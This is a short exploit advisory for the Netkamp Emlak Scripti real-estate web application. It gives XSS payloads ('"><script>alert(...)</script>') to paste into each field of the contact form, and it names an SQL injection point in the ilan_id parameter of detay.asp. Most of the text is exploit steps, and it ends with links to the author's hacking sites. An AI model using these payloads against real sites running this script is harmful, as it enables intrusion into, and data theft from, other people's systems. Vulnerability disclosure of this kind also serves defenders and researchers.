Netkamp Emlak Scripti XSS & Sql İnjections Vulnerability

#Software: Netkamp Emlak Scripti
#download: not free(350 YTL) sale: http://www.netkamp.com/net_emlak.asp
#demo: http://netemlak.netkamp.com/
#Found By: GeFORC3 ( G3 )


#Exploit & example :

-----------------------------------------------------------------------
#XSS:

http://www.site.com/script_path/iletisim.asp

write to xss code in script's tex box

expample:

İletişim Formu(contact form)

Adınız: "><script>alert("G3");</script>
Soyadınız: "><script>alert("G3");</script>
E-Mail:  "><script>alert("G3");</script>
Konu: "><script>alert("G3");</script>
Mesajınız: "><script>alert("G3");</script>

Press to "gönder"(send) button.

This xss works on "Netkamp Emlak Scripti" script's contact page
-----------------------------------------------------------------------
#Sql İnjections

http://www.site.com.com/script_path/detay.asp?ilan_id=[SQL]


-----------------------------------------------------
WwW.GeFORC3.ORG  |  WwW.HeykirBlog.Org  |  WwW.NetKaBus.CoM